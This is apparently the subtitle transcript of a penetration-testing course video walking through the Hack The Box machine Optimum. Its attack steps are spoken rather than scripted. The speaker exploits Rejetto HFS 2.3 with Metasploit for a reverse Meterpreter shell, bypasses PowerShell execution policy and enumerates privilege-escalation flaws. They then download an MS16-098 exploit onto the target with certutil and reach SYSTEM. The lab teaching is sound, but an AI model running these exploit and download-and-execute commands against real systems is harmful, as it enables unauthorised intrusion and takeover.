1 00:00:00,120 --> 00:00:02,760 Welcome to walkthrough seven.
2 00:00:02,760 --> 00:00:07,830 We're going to be covering a box called Optimum. Optimum lives at 10.10.
3 00:00:07,860 --> 00:00:08,550 10.
4 00:00:08,640 --> 00:00:09,410 8.
5 00:00:09,480 --> 00:00:11,220 So same as the last video.
6 00:00:11,220 --> 00:00:15,250 Go ahead and start that box up, start an nmap scan now.
7 00:00:15,270 --> 00:00:19,560 Get everything ready to roll and then catch me in the next video.
8 00:00:19,560 --> 00:00:24,360 If you're not doing the walkthrough, if you're just watching along, go ahead and just keep the film
9 00:00:24,360 --> 00:00:25,280 rolling.
10 00:00:25,350 --> 00:00:27,670 Let's go ahead and get started.
11 00:00:27,680 --> 00:00:28,150 All right.
12 00:00:28,180 --> 00:00:37,040 So our scan is back and we are lucky again, in two videos I do believe, where we only have one port open.
13 00:00:37,040 --> 00:00:44,750 So again we have port 80 open here, which means that our attack vector, outside of something like port
14 00:00:44,750 --> 00:00:47,910 knocking, is going to be through port 80.
15 00:00:48,080 --> 00:00:54,560 So because it's through port 80 we are very direct in what we can do with our attacks.
16 00:00:54,590 --> 00:01:04,250 So right off the bat we can see here that we have this HttpFileServer httpd 2.3, also known
17 00:01:04,280 --> 00:01:07,400 as HFS 2.3.
18 00:01:07,400 --> 00:01:07,740 OK.
19 00:01:07,750 --> 00:01:14,300 So we can take this information and go to Google, say hey, is there an HFS 2.3, is there
20 00:01:14,300 --> 00:01:20,690 some sort of exploit for it; we can use searchsploit and search for it. But before we do any of that I
21 00:01:20,690 --> 00:01:28,350 do want to go out to the web page and just make sure we know what we're working with here. So we come
22 00:01:28,350 --> 00:01:31,260 to this web page and there's no files in this folder.
23 00:01:31,260 --> 00:01:33,110 We understand that it's a file server.
24 00:01:33,120 --> 00:01:38,680 So we should have the ability to upload files, download files, but there's nothing here.
25 00:01:39,050 --> 00:01:42,590 And at the moment we aren't logged in as anybody either.
26 00:01:42,720 --> 00:01:49,500 So we could go to the login and attempt to log in and see if there are any username credentials that
27 00:01:49,500 --> 00:01:51,420 we can access with.
28 00:01:51,420 --> 00:01:56,880 We could go to Google here and say hey, this HFS file server,
29 00:01:56,880 --> 00:01:59,750 does it have default credentials?
30 00:01:59,790 --> 00:02:01,050 And we can look that up.
31 00:02:01,050 --> 00:02:04,410 Now HFS by default does not have default credentials.
32 00:02:04,410 --> 00:02:07,500 Those are actually set up when you set up HFS.
33 00:02:07,530 --> 00:02:10,970 So in terms of security that's a good thing.
34 00:02:11,040 --> 00:02:18,390 But you're going to find here that there is not so good stuff going on as well. If we actually look at
35 00:02:18,500 --> 00:02:25,380 this link here, the HttpFileServer 2.3, you could see at the bottom that rejetto dot
36 00:02:25,380 --> 00:02:26,760 com pops up.
37 00:02:26,940 --> 00:02:34,620 So Rejetto is the vendor. This is who makes this file server 2.3. Come down here and just go
38 00:02:34,620 --> 00:02:42,060 to searchsploit and just say searchsploit rejetto and see what's there, and you could see immediately
39 00:02:42,060 --> 00:02:46,820 that, well, there is a Metasploit module, right.
40 00:02:46,920 --> 00:02:51,760 There is some Python for 2.x, but 2.3 is showing up repeatedly.
41 00:02:52,180 --> 00:03:00,790 So if we were to go out to the interwebs and do something like Rejetto HFS 2.3
42 00:03:00,790 --> 00:03:04,670 exploit, just Google... Google knows what we're after.
43 00:03:04,690 --> 00:03:07,550 So there is an exploit-db.
44 00:03:07,570 --> 00:03:08,780 We can check that out.
45 00:03:09,100 --> 00:03:14,680 There's a Rapid7, our favorite, because we can just use the pre-existing Metasploit module if we
46 00:03:14,680 --> 00:03:15,710 want to.
47 00:03:16,210 --> 00:03:23,790 And we come through here, you can see that Rejetto HttpFileServer is vulnerable to remote command execution.
48 00:03:23,800 --> 00:03:24,700 Fantastic.
49 00:03:24,700 --> 00:03:25,500 This is what we want.
50 00:03:25,510 --> 00:03:26,350 Right.
51 00:03:26,350 --> 00:03:30,780 On Windows XP, Windows 7 and Windows 8 is where it's been tested.
52 00:03:30,790 --> 00:03:36,110 Doesn't mean it's not other operating systems as well.
53 00:03:36,340 --> 00:03:43,090 When you come through here, and we've got this, we've got this as well: we can download this Python file
54 00:03:43,120 --> 00:03:46,050 and attempt to execute manually.
55 00:03:46,060 --> 00:03:50,800 But in this instance we're just gonna take what we know and we're going to take Metasploit and try
56 00:03:50,800 --> 00:03:52,300 to get a shell.
57 00:03:52,330 --> 00:03:55,830 So this looks like a winner for us, especially with remote code execution.
58 00:03:56,260 --> 00:03:59,440 So let's go into here and we'll just go and boot up Metasploit
59 00:04:02,660 --> 00:04:05,920 and we're going to attack this machine.
60 00:04:05,960 --> 00:04:07,540 We don't know a lot about it.
61 00:04:07,540 --> 00:04:09,080 Let's go back to the scan and see.
62 00:04:09,080 --> 00:04:19,610 So the best guess here, the best OS guess, is that it's a Windows Server 2012, 2012 R2, and you're seeing
63 00:04:19,610 --> 00:04:21,020 that come through quite a bit.
64 00:04:21,020 --> 00:04:27,020 So it's pulling down information that it really believes it's 2012 and even believes Windows 7 or Windows
65 00:04:27,020 --> 00:04:35,390 8. So because of this I think there's probably a high likelihood that this machine is going to be a 64
66 00:04:35,390 --> 00:04:37,320 bit as opposed to a 32 bit.
67 00:04:37,760 --> 00:04:44,120 So we could try a 64 bit payload first; if it doesn't work then we'll go with a 32 bit payload and just
68 00:04:44,120 --> 00:04:45,360 be safe.
69 00:04:45,440 --> 00:04:54,440 So let's go ahead and just search for rejetto quick and then we'll say use exploit/windows/http/
70 00:04:55,020 --> 00:04:56,880 rejetto_hfs_exec.
71 00:04:56,890 --> 00:04:57,680 Exactly.
72 00:04:57,860 --> 00:04:58,290 OK.
73 00:04:58,310 --> 00:05:00,260 Options.
74 00:05:00,400 --> 00:05:04,000 We're going to go ahead and set our RHOST
75 00:05:06,630 --> 00:05:09,560 to 10.10.10.8.
76 00:05:09,960 --> 00:05:15,330 The rest of it looks OK at this point and then the exploit target is automatic.
77 00:05:15,360 --> 00:05:18,890 Let's go ahead and just show targets and see what they're picking.
78 00:05:18,900 --> 00:05:20,460 So all they have is automatic.
79 00:05:20,460 --> 00:05:35,100 All right, let's go ahead and set the payload to windows/x64/meterpreter/reverse_tcp. Options.
80 00:05:35,990 --> 00:05:36,360 OK.
81 00:05:36,390 --> 00:05:39,990 Set our LHOST and we'll set it to tun0.
82 00:05:39,990 --> 00:05:43,170 Now this is a trick actually sent in by a user.
83 00:05:43,170 --> 00:05:45,680 So if you are watching this and you're the one to tell me about this,
84 00:05:45,680 --> 00:05:46,050 thank you.
85 00:05:46,050 --> 00:05:47,940 This is actually a really cool trick.
86 00:05:47,940 --> 00:05:54,870 You can just set your interface, which, if I ever read, I would notice that, instead of typing in your address
87 00:05:54,870 --> 00:05:57,990 or having to go back and look for the IP address that you're working with.
88 00:05:58,740 --> 00:06:07,120 So interface here, port, and then we can just go ahead and run this bad boy and see what happens, and boom,
89 00:06:07,180 --> 00:06:09,740 right away we'll get a returned Meterpreter session.
90 00:06:09,760 --> 00:06:11,390 So that's awesome.
91 00:06:11,410 --> 00:06:12,430 Go ahead, hit enter.
92 00:06:12,430 --> 00:06:15,760 It's going to take a second, I think, with this cleanup trying to go on.
93 00:06:15,810 --> 00:06:25,410 OK, so we can say sysinfo and we are 64 bit Meterpreter on 64 bit architecture.
94 00:06:25,410 --> 00:06:28,020 That is where we want to be.
95 00:06:28,020 --> 00:06:31,360 So now let's go ahead and look at the getuid.
96 00:06:31,890 --> 00:06:33,630 Well, the getuid is kostas.
97 00:06:33,640 --> 00:06:35,280 So we're going to have to do some privesc.
98 00:06:35,910 --> 00:06:40,470 So a couple of ways to get privesc. We can say getsystem; that didn't work.
99 00:06:40,680 --> 00:06:51,600 We can background and we can say, we could say search for suggester again, and we can just use post/multi/
100 00:06:51,630 --> 00:06:54,820 recon/local_exploit_suggester.
101 00:06:54,900 --> 00:07:01,280 Now if I'm going through this fast it's because I've expected you to know this by now.
102 00:07:01,290 --> 00:07:01,620 Right.
103 00:07:01,620 --> 00:07:04,980 All these things we're seeing so far I've shown you.
104 00:07:05,070 --> 00:07:14,760 Let's go ahead and we'll say options on this one. I had set a session; set session to 1 and then we're
105 00:07:14,760 --> 00:07:17,310 going to run this, but then we're gonna automatically cancel it.
106 00:07:18,420 --> 00:07:22,100 So let's Control-C. Actually, actually no, let's run it.
107 00:07:22,100 --> 00:07:25,670 Sorry, I was thinking ahead, but that's fine.
108 00:07:25,770 --> 00:07:29,850 So we're going to run this and let's see if it collects anything.
109 00:07:29,850 --> 00:07:39,810 Now it should be noted that on 64 bit machines it's not, it's not easy to gather local exploits from
110 00:07:39,810 --> 00:07:43,410 the exploit suggester; it's better for 32 bit machines.
111 00:07:43,440 --> 00:07:49,450 So you're going to see here that it's going to try some of these and none of them are coming through.
112 00:07:49,690 --> 00:07:50,020 OK.
113 00:07:50,020 --> 00:07:52,010 That's not a big deal.
114 00:07:52,180 --> 00:07:58,780 So we're gonna have to do manual post exploitation, and this is something we haven't covered.
115 00:07:59,290 --> 00:08:05,470 But I have thrown out in the past that there are scripts out there on both the Windows side and the
116 00:08:05,470 --> 00:08:06,070 Linux side.
117 00:08:06,070 --> 00:08:07,440 We covered Linux.
118 00:08:07,510 --> 00:08:09,500 We talked about the scripts that are out there.
119 00:08:10,150 --> 00:08:16,390 So if you, this is where you should have gotten this far with everything we've learned, right, and you
120 00:08:16,390 --> 00:08:23,890 have the tools and the mindset by now to know hey, OK, how do I, how do I get better, how do I escalate
121 00:08:23,890 --> 00:08:25,080 these privileges.
122 00:08:25,390 --> 00:08:34,300 And we can say OK, well, we're gonna have to go to Google. Go to Google, we can say OK, Google, windows privilege
123 00:08:34,570 --> 00:08:35,810 escalation.
124 00:08:35,860 --> 00:08:41,860 Now there is a great, great guide out there by FuzzySecurity. It is considered pretty much the Bible
125 00:08:42,340 --> 00:08:43,660 when it comes to privesc.
126 00:08:43,690 --> 00:08:48,640 Now we can go through, we can check all of this information that comes through here.
127 00:08:48,670 --> 00:08:54,700 Lucky for us some people have scripted some of this, but there are still very manual methods to doing
128 00:08:54,700 --> 00:09:01,560 this, especially when we're talking, you know, just gathering some, some of this information.
129 00:09:01,570 --> 00:09:06,970 It can be automated, gathering system info and looking for different items based on that, or based on
130 00:09:06,970 --> 00:09:12,670 packages. Some of this is just really, you're going to have to look through it and see what kind of
131 00:09:12,670 --> 00:09:17,320 information comes back and if anything stands out, or maybe there's programs that are running that you
132 00:09:17,320 --> 00:09:18,340 can escalate with.
133 00:09:19,090 --> 00:09:25,210 So we haven't dove too deep into this yet and that's OK. Privilege escalation, this kind of stuff, isn't
134 00:09:25,240 --> 00:09:26,940 hyper realistic.
135 00:09:27,050 --> 00:09:32,290 There's some realism. When you're doing pen tests, the majority of the time your privesc isn't going to
136 00:09:32,290 --> 00:09:37,640 fall from any of these kind of things. It doesn't mean it can't happen; it just means it's not likely. Privesc
137 00:09:37,650 --> 00:09:43,520 is, is usually on the Active Directory side and it's not related to most of this stuff.
138 00:09:43,600 --> 00:09:50,590 This is better for capture the flag type things, you know, doing the Hack The Box machines or any other
139 00:09:50,590 --> 00:09:58,660 type of lab environment like this where they demonstrate the ability to use exploits and privilege escalation.
140 00:09:58,660 --> 00:10:06,730 Now there is a tool that I want to point out that I think is really good, and it's been updated recently,
141 00:10:06,880 --> 00:10:08,500 but we're still going to use the older version.
142 00:10:08,500 --> 00:10:12,820 We could say Sherlock, and this is written by rasta-mouse.
143 00:10:12,820 --> 00:10:21,160 So if you type in Sherlock rasta-mouse you can see it's a PowerShell script here, so we can go ahead
144 00:10:21,190 --> 00:10:28,810 and just clone or download this whole thing, and we could see also that it quickly looks for the following
145 00:10:28,810 --> 00:10:36,920 items, and so all of these different privilege escalation vulnerabilities on Windows.
146 00:10:36,930 --> 00:10:43,980 The other thing that we could do too is we could go into our session again and we can just say shell.
147 00:10:43,980 --> 00:10:45,240 Or we're going to say sysinfo.
148 00:10:45,240 --> 00:10:45,630 Right.
149 00:10:46,200 --> 00:10:47,550 And we could see that we're on build
150 00:10:47,560 --> 00:10:56,190 9600. We could say Windows 2012 R2, do a copy on that, and we could go to Google and
151 00:10:56,190 --> 00:11:02,140 just say hey, is there privilege escalation for this.
152 00:11:02,280 --> 00:11:10,580 And the first one here is this MS16-032 that shows up now.
153 00:11:11,150 --> 00:11:11,720 OK.
154 00:11:11,720 --> 00:11:13,500 And MS16-032.
155 00:11:13,520 --> 00:11:20,900 And this is for Windows 7 through 10, 2008 through 2012, 32 and 64 bit.
156 00:11:21,590 --> 00:11:27,560 So it needs a race condition. To see, there must be two-plus CPU cores; if testing in a VM, just make sure
157 00:11:27,560 --> 00:11:28,530 they add a core.
158 00:11:28,790 --> 00:11:29,630 OK.
159 00:11:29,780 --> 00:11:38,140 So there is a, there is a PowerShell exploit, or PowerShell, I think it might be part of the PowerSploit
160 00:11:38,180 --> 00:11:39,490 package by measure.
161 00:11:39,500 --> 00:11:43,610 Definitely a PowerShell exploit that's available for us.
162 00:11:43,610 --> 00:11:52,520 There is also, we can search this as well, we can background and just say search MS16-032, something
163 00:11:52,520 --> 00:11:53,780 like this.
164 00:11:53,780 --> 00:11:56,230 And this does exist here.
165 00:11:56,330 --> 00:11:57,950 So let's go ahead and copy this
166 00:12:00,990 --> 00:12:07,020 and we'll just say use and paste.
167 00:12:07,160 --> 00:12:08,260 So again, the...
168 00:12:09,140 --> 00:12:11,300 The OS information is important; the build
169 00:12:11,300 --> 00:12:14,020 information is important. The same thing with Linux.
170 00:12:14,030 --> 00:12:18,680 The, one of the first things you're gonna be looking for, outside of like looking at the history or looking
171 00:12:18,680 --> 00:12:25,130 at sudo privileges, you're going to want to look at, on a Linux machine, the type of OS that's running,
172 00:12:25,130 --> 00:12:31,730 the build that's running, and see if there are any exploits or privesc exploits specifically for that,
173 00:12:32,010 --> 00:12:34,880 that OS and the architecture.
174 00:12:34,880 --> 00:12:39,020 So this is one of the, kind of the, basic 101s of what to look for.
175 00:12:39,110 --> 00:12:44,120 And even if you look back at this FuzzySecurity guide you could see that they're doing information
176 00:12:44,120 --> 00:12:49,730 gathering. The very first step that they do is they gather the OS name and the OS version.
177 00:12:49,730 --> 00:12:52,120 So super important information here.
178 00:12:52,130 --> 00:12:59,720 Now let's go ahead and type options and let's set the session here to 1, and then you see the target
179 00:12:59,720 --> 00:13:07,490 down there is x86. We know we are on x64, so let's show targets and we'll set target to 1.
180 00:13:08,630 --> 00:13:08,960 OK.
181 00:13:08,960 --> 00:13:14,750 Now I'm going to run this and then I'm going to kill it, see if I can kill it.
182 00:13:15,610 --> 00:13:15,910 OK.
183 00:13:15,910 --> 00:13:17,830 Options.
184 00:13:17,920 --> 00:13:20,710 So again it pulls the LHOST.
185 00:13:20,710 --> 00:13:25,590 I actually tried this with setting my interface first and it's still messed up.
186 00:13:25,600 --> 00:13:29,040 So we just have to kill it here.
187 00:13:29,170 --> 00:13:29,770 Come back.
188 00:13:29,760 --> 00:13:32,460 Set the LHOST to our tun0.
189 00:13:32,480 --> 00:13:34,900 Let's go ahead and pick a new LPORT.
190 00:13:34,900 --> 00:13:41,070 Let's put the LPORT, like, we'll do 443 here and we'll try running this.
191 00:13:41,140 --> 00:13:43,030 Now this exploit is iffy.
192 00:13:43,120 --> 00:13:46,860 It works sometimes and it works sometimes not.
193 00:13:46,870 --> 00:13:48,660 So we'll see if we can get this to work.
194 00:13:48,670 --> 00:13:54,100 If not, we'll go back and we'll do the manual, more manual method of getting it to work.
195 00:13:54,640 --> 00:13:56,440 So I've gotten this to pull
196 00:13:56,470 --> 00:14:01,830 once or twice, but in the end it doesn't really like executing this script.
197 00:14:01,840 --> 00:14:03,440 So we'll see how this works.
198 00:14:03,490 --> 00:14:03,730 OK.
199 00:14:03,750 --> 00:14:05,380 So we ran it twice here.
200 00:14:05,380 --> 00:14:06,430 And for me it didn't work.
201 00:14:06,430 --> 00:14:08,830 Maybe you got lucky and it works for you.
202 00:14:08,860 --> 00:14:14,900 But let's go ahead and take a look at the more manual method that we can use and we'll go from there.
203 00:14:14,920 --> 00:14:15,210 OK.
204 00:14:15,220 --> 00:14:21,430 So I'm going to show you two different tools that we can use to do privilege escalation enumeration.
205 00:14:21,520 --> 00:14:25,790 The first one that we covered already is this rasta-mouse Sherlock.
206 00:14:26,350 --> 00:14:28,270 So let's go ahead and just click on this
207 00:14:28,270 --> 00:14:35,440 Sherlock.ps1 and then what I'll do is we'll just take the raw version, Control-A, Control-C.
208 00:14:35,450 --> 00:14:43,500 This will be the easiest way. We'll come into our terminal here and then I'm going to open up a new tab
209 00:14:44,920 --> 00:14:51,580 and then we will just say gedit and we'll just call this, you call it whatever you want to call it,
210 00:14:51,580 --> 00:14:52,030 Sher.
211 00:14:52,180 --> 00:14:55,890 ps1 is for easy naming reference.
212 00:14:55,930 --> 00:14:58,630 Go ahead and Control-V here.
213 00:14:58,630 --> 00:15:03,180 Paste this in and save it. OK.
214 00:15:03,210 --> 00:15:12,240 Now on our end over here, what we're gonna do is we are going to come back to our machine, or go into
215 00:15:12,240 --> 00:15:19,410 our sessions, and then type in shell. OK, we're on our desktop.
216 00:15:19,440 --> 00:15:20,380 That's fine.
217 00:15:20,400 --> 00:15:25,380 Let's go ahead and grab that file, so let's load up the file here.
218 00:15:25,380 --> 00:15:37,680 We're going to do our Python SimpleHTTPServer, with the -m of course, and then try it on port
219 00:15:37,710 --> 00:15:41,940 80, let that run, and then we're gonna use certutil.
220 00:15:41,960 --> 00:15:45,010 All this should be refreshing your information, right.
221 00:15:45,000 --> 00:15:54,000 certutil -urlcache, and then -f http://, and then our IP, which I honestly don't know,
222 00:15:54,000 --> 00:15:54,730 the IP address.
223 00:15:54,750 --> 00:15:56,850 I think it's dot 8.
224 00:15:56,950 --> 00:16:04,130 Well, do ifconfig. I have dot 14, actually, 14, forward slash, Sher dot
225 00:16:04,130 --> 00:16:06,260 ps1, we'll call this Sher dot
226 00:16:06,290 --> 00:16:09,890 ps1. OK.
227 00:16:09,980 --> 00:16:16,310 If we say dir we should see that, OK, Sher dot
228 00:16:16,330 --> 00:16:21,000 ps1 is here. So here's what we're gonna do.
229 00:16:21,000 --> 00:16:28,920 We are going to execute this file and we're just gonna say something along the lines of powershell
230 00:16:28,970 --> 00:16:29,630 dash
231 00:16:29,650 --> 00:16:37,050 ExecutionPolicy bypass. All we're doing is bypassing the execution policy.
232 00:16:37,080 --> 00:16:41,430 This is something, if you're not familiar with PowerShell, that's just there to prevent us from running
233 00:16:42,690 --> 00:16:47,730 files that perhaps could be malicious. It's not really anything other than a protection that we just
234 00:16:47,730 --> 00:16:48,670 turn off.
235 00:16:49,110 --> 00:16:54,090 So we're going to turn that off here and then we're going to run a command, and the command that we're
236 00:16:54,090 --> 00:17:06,390 gonna run is something along the lines like this: we are going to say Import-Module and then we're going
237 00:17:06,390 --> 00:17:16,490 to import good old Sher.ps1 here, and then we're gonna run the command Find-AllVulns, which
238 00:17:16,490 --> 00:17:27,070 is part of the Sherlock template. Do this, execute, and there we go.
239 00:17:28,240 --> 00:17:30,170 So come through here.
240 00:17:30,190 --> 00:17:31,630 Sherlock executes.
241 00:17:31,630 --> 00:17:34,750 And you can see that it's starting to search for vulnerabilities.
242 00:17:34,990 --> 00:17:38,740 You see not vulnerable, blah blah blah, all the way down.
243 00:17:38,740 --> 00:17:40,390 Scroll through.
244 00:17:40,540 --> 00:17:40,840 OK.
245 00:17:40,840 --> 00:17:45,280 And the MS16-032 shows up again and appears vulnerable.
246 00:17:45,290 --> 00:17:48,510 MS16-034, MS16-135.
247 00:17:49,150 --> 00:17:52,180 And it has NSA tonight as well, and vulnerable.
248 00:17:52,330 --> 00:17:52,690 OK.
249 00:17:52,750 --> 00:17:59,610 So there's these three here as potential possibilities. We've already identified the MS16-032 and
250 00:17:59,610 --> 00:18:00,470 tried it with Metasploit.
251 00:18:00,480 --> 00:18:01,380 It did not work.
252 00:18:01,380 --> 00:18:04,430 This machine is vulnerable to MS16-032.
253 00:18:04,440 --> 00:18:07,250 However, it is a little beyond our scope.
254 00:18:07,260 --> 00:18:10,440 It gets a little advanced in how we need to exploit it.
255 00:18:10,680 --> 00:18:15,950 And I think that it's possibly even a later episode that we can kind of start getting into that stuff.
256 00:18:15,990 --> 00:18:21,170 It's very PowerShell heavy and involves a little bit of modification and downloading.
257 00:18:21,230 --> 00:18:22,920 So I'm going to avoid that method.
258 00:18:22,950 --> 00:18:26,690 But lucky for us there are a couple other methods that we can use.
259 00:18:26,970 --> 00:18:29,940 Now this was just one item here, right.
260 00:18:29,970 --> 00:18:31,280 So we're using this.
261 00:18:31,290 --> 00:18:35,760 We found three potential vulnerabilities that might work.
262 00:18:35,760 --> 00:18:38,860 Let's look at another thing that we can do as well.
263 00:18:38,880 --> 00:18:44,760 Now there is a great tool out there. If we go to the Googles and go to google dot com and we just say,
264 00:18:45,530 --> 00:18:53,290 we are going to search for Windows Exploit Suggester, and this GDSSecurity right here.
265 00:18:53,310 --> 00:19:01,460 Let's go ahead and just copy this and we're just going to clone this whole thing here, copy this.
266 00:19:01,570 --> 00:19:11,360 Come over here and we're going to do a git clone on this item, and we'll cd into the windows-exploit-
267 00:19:11,420 --> 00:19:14,590 suggester and ls.
268 00:19:14,690 --> 00:19:15,080 OK.
269 00:19:15,110 --> 00:19:21,020 So if you look at the file description down here you can see that we need to run this update.
270 00:19:21,290 --> 00:19:23,020 So we'll go ahead and update it.
271 00:19:24,290 --> 00:19:29,330 So we'll say python windows-exploit-suggester.py --update, like this.
272 00:19:29,910 --> 00:19:30,290 OK.
273 00:19:30,290 --> 00:19:33,050 Now you see that it wrote an Excel file out for us.
274 00:19:33,140 --> 00:19:36,120 So now we're going to actually use that Excel file.
275 00:19:36,200 --> 00:19:38,130 Actually, let's do one thing first.
276 00:19:38,150 --> 00:19:44,620 So in order to run this we need the Excel file that it just provided, the database, and the system info.
277 00:19:44,870 --> 00:19:48,410 So we got to go ahead and type in systeminfo on our shell.
278 00:19:48,990 --> 00:19:51,950 So we go back to our shell and we type in systeminfo.
279 00:19:55,100 --> 00:20:01,320 We need to copy all of this information that just came out right here.
280 00:20:01,350 --> 00:20:01,960 Copy.
281 00:20:02,400 --> 00:20:10,500 And then we can just put this into a text file; call it gedit sysinfo.txt, paste that, and save
282 00:20:10,500 --> 00:20:13,260 it. OK.
283 00:20:13,300 --> 00:20:21,550 So looking at the syntax we need to run python --database, something like this. We'll copy it, so to say python,
284 00:20:22,810 --> 00:20:32,630 paste this. Our database is this 2019 right there; it should auto tab complete.
285 00:20:32,640 --> 00:20:41,220 Next thing we need is we need our system info text file, so --systeminfo, and then sysinfo
286 00:20:41,220 --> 00:20:48,420 .txt. Run that. Now it's going to determine if there's any types of vulnerabilities based on this. Let's
287 00:20:48,420 --> 00:20:55,500 make this a little bit bigger, and if we look through this we can see anything that lights up like a
288 00:20:55,500 --> 00:21:00,270 Christmas tree in green is potentially vulnerable, right.
289 00:21:00,280 --> 00:21:01,480 So it's searching through.
290 00:21:02,320 --> 00:21:09,930 And it's looking through all of these, right, and let's see if we scroll down to the bottom.
291 00:21:10,640 --> 00:21:11,080 OK.
292 00:21:11,080 --> 00:21:19,660 It does pick up again and picks up MS16-032 here. Another potential exploit is right here.
293 00:21:19,660 --> 00:21:23,850 This MS16-098, second one down the list for us.
294 00:21:23,860 --> 00:21:26,960 Thankfully we wouldn't have gone too far.
295 00:21:27,040 --> 00:21:36,040 Now the nice thing too is it provides us an exploit-db link, so we can actually just open the link, go
296 00:21:36,040 --> 00:21:39,880 right to it, and download this exploit here,
297 00:21:43,320 --> 00:21:48,340 so it's going to save into our downloads in a .c format.
298 00:21:48,750 --> 00:21:58,620 So let's go ahead and open up a new tab here and I'm going to cd back into downloads and then we have
299 00:21:58,740 --> 00:22:00,990 to gcc this.
300 00:22:00,990 --> 00:22:08,580 So we're going to gcc 41020.c here.
301 00:22:08,580 --> 00:22:16,480 We'll just do an output of ex.exe. We've got a fatal error. OK.
302 00:22:16,480 --> 00:22:18,430 Let's take a look at that fatal error.
303 00:22:18,430 --> 00:22:20,980 We don't have a windows.h file.
304 00:22:20,980 --> 00:22:30,060 Let's see if... OK, we need a windows.h. OK, we can actually also download the binary right here, it
305 00:22:30,060 --> 00:22:35,630 looks like. Let's just copy this, and we might actually even have it on our, on our computer as well.
306 00:22:35,640 --> 00:22:41,570 So windows.h, we could download that and put that into our compiler.
307 00:22:41,600 --> 00:22:50,790 But let's see if we can just do a locate on 41020 and see if there's a .exe already built in.
308 00:22:50,790 --> 00:22:51,510 There is not.
309 00:22:51,540 --> 00:22:54,610 But we can go ahead and just download it.
310 00:22:54,750 --> 00:22:56,730 We can search for it as well.
311 00:22:56,730 --> 00:23:00,680 Just to make really quick sure that we don't have it.
312 00:23:00,870 --> 00:23:07,360 It is MS16, not 12, 16, 098,
313 00:23:11,860 --> 00:23:16,060 and we've got the .c file already downloaded here, which you could have grabbed, and then the text.
314 00:23:16,120 --> 00:23:16,360 OK.
315 00:23:16,420 --> 00:23:23,030 Let's go ahead and just paste here and download this and we'll save this. OK.
316 00:23:23,050 --> 00:23:33,780 And from here we're going to kill out of this and go ahead and open up our Python web server in this folder,
317 00:23:33,780 --> 00:23:36,480 because we just downloaded it to the HTB folder.
318 00:23:41,530 --> 00:23:47,730 Sorry, I am backwards. SimpleHTTPServer on 80. OK.
319 00:23:47,740 --> 00:23:53,350 So now we're hosting up that file. Let's go ahead and put it onto this machine.
320 00:23:53,620 --> 00:23:55,780 So we're still on a shell here.
321 00:23:55,780 --> 00:24:04,990 We're going to do certutil again, -urlcache again, file transfer, and we said we are at
322 00:24:04,990 --> 00:24:07,060 14 dot 14 for me.
323 00:24:07,600 --> 00:24:19,220 And then this one was called 41020.exe and we'll call it sh.c. OK.
324 00:24:19,460 --> 00:24:20,900 Unless you can see.
325 00:24:20,910 --> 00:24:23,710 Sorry, sir, I'm losing my mind today, guys.
326 00:24:24,240 --> 00:24:24,640 OK.
327 00:24:24,660 --> 00:24:32,490 We try to run sh.exe and let's see what happens. OK.
328 00:24:32,490 --> 00:24:33,500 And it's not working.
329 00:24:33,510 --> 00:24:34,770 Why is it not working?
330 00:24:34,770 --> 00:24:39,540 Because if you look up in the upper right hand corner and you look at this, actually you see 0 bytes
331 00:24:39,540 --> 00:24:44,460 actually transferred over, because we never really transferred over the file. We just transferred over
332 00:24:44,460 --> 00:24:45,630 a placeholder.
333 00:24:45,780 --> 00:24:48,000 Firefox has determined this was malware.
334 00:24:48,030 --> 00:24:50,990 Let's go ahead and just hit open, come back.
335 00:24:51,000 --> 00:24:56,040 We're actually gonna have to kill this shell here and then we're gonna go ahead and say shell one more
336 00:24:56,040 --> 00:25:04,560 time. We'll do our certutil again, -urlcache, -f, and this may have actually worked for you
337 00:25:04,560 --> 00:25:10,860 if you didn't get caught by the Microsoft, or the, sorry, the Firefox here.
338 00:25:10,860 --> 00:25:20,400 You can do 10.10.14.14 forward slash and this is 41020.exe.
339 00:25:21,000 --> 00:25:22,460 Give it a safe shot.
340 00:25:22,470 --> 00:25:32,610 You see it wrote that file. If we can do a dir now, you see we actually have executable 41020
341 00:25:32,640 --> 00:25:33,360 .exe
342 00:25:36,170 --> 00:25:38,290 and whoami.
343 00:25:38,300 --> 00:25:41,470 We are NT AUTHORITY\SYSTEM, so we have rooted this machine.
344 00:25:42,710 --> 00:25:48,610 OK, that was a bit of a cluster [REMOVED] and you could see me struggle at times as well.
345 00:25:48,620 --> 00:25:49,670 This one was not.
346 00:25:50,270 --> 00:25:56,600 Now this one is fully capable of being rooted from everything we learned in the past, though it is not
347 00:25:56,660 --> 00:26:01,330 completely easy to do so right up until this point.
348 00:26:01,350 --> 00:26:08,980 I've given you the tools necessary to be successful and I'm guessing most of you probably got the, at
349 00:26:09,020 --> 00:26:11,620 least the path into a user.
350 00:26:11,630 --> 00:26:17,690 Now we have relied on some things like the local exploit suggester for Windows and we have done some
351 00:26:17,690 --> 00:26:24,990 privesc with Linux, but we never really touched on the methodology needed for the Windows side of things.
352 00:26:25,010 --> 00:26:31,430 That is a little bit of the work harder aspect of pen testing, is to kind of try to figure this out on
353 00:26:31,430 --> 00:26:39,380 your own, and hopefully some of you got the idea to go and look for some of these exploits. Now again,
354 00:26:39,710 --> 00:26:41,750 it's probably time consuming, right.
355 00:26:41,750 --> 00:26:52,010 If you come through and you see the list of just different types of exploits that are possible, and again,
356 00:26:52,640 --> 00:26:55,180 there are more than one ways to skin a cat here.
357 00:26:55,190 --> 00:27:01,700 The 032 would work, and there are some PowerShell modules that we could use against it now.
358 00:27:01,790 --> 00:27:03,950 Again, it's a little more complicated.
359 00:27:03,950 --> 00:27:09,410 I do welcome you to try it and see if you can get it to work, but that's something that we will work
360 00:27:09,410 --> 00:27:11,280 on in the future.
361 00:27:11,630 --> 00:27:18,620 But in this video we did manage to do privilege escalation with the Windows machine and use a couple
362 00:27:18,620 --> 00:27:20,540 of new tools to do so, right.
363 00:27:20,540 --> 00:27:26,060 We learned about the FuzzySecurity, and this is a great guide that anybody should keep in their back
364 00:27:26,060 --> 00:27:30,240 pocket, especially if you're doing Hack The Box style machines.
365 00:27:30,290 --> 00:27:37,660 We learned about rasta, rasta-mouse and the Sherlock, which has actually been deprecated.
366 00:27:37,700 --> 00:27:44,870 I'm not sure what they've moved on to, but it's called, what's, Watson now. Everybody's new thing is to
367 00:27:44,870 --> 00:27:52,460 write in C or C sharp and then make these .sln files and you have to compile them yourself into
368 00:27:52,460 --> 00:27:57,620 executables, and this is actually in .NET, so everybody's moving away,
369 00:27:57,620 --> 00:28:00,770 it seems like, from PowerShell now and into these.
370 00:28:00,770 --> 00:28:02,690 This is the new, the new hype.
371 00:28:02,690 --> 00:28:03,850 So.
